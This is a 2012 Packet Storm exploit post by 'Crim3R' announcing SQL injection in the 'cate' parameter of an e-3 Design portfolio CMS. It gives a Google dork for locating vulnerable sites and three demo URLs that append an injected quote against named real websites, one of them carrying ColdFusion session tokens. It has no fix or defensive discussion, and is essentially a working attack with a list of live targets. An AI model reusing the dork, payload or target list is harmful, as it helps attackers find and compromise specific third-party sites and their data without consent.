E-3 Design SQL Injection

2012-10-22T00:00:00
ID PACKETSTORM:117597
Type packetstorm
Reporter Crim3R
Modified 2012-10-22T00:00:00

Description

                                        
                                            `# Exploit Title: e-3 Design Sql Injection ~  
# Google Dork: inurl:"/portfolio/content.cfm?pageType="  
# Date: 10/20/2012  
# Author: Crim3R  
# Vendor Home: http://www.e-3design.com/  
# Version: -  
# Tested on: Linux Redhat  
===============[Vuln Codes]=============  
cate parametr is injactable ==>  
D3M0:  
http://www.oceanartshawaii.com/portfolio/content.cfm?pageType=2&cate=10%27  
http://www.stevesullyphoto.com/portfolio/content.cfm?pageType=2&cate=9%27  
http://www.sallyfarndon.com/portfolio/content.cfm?cate=55%27&pageType=2&pageID=1&CFID=18582663&CFTOKEN=ac083224dd9b891d-821E36A0-1422-0A0A-16B2C16DD8B2FC94  
  
  
===============Crim3R@Att.Net===========  
`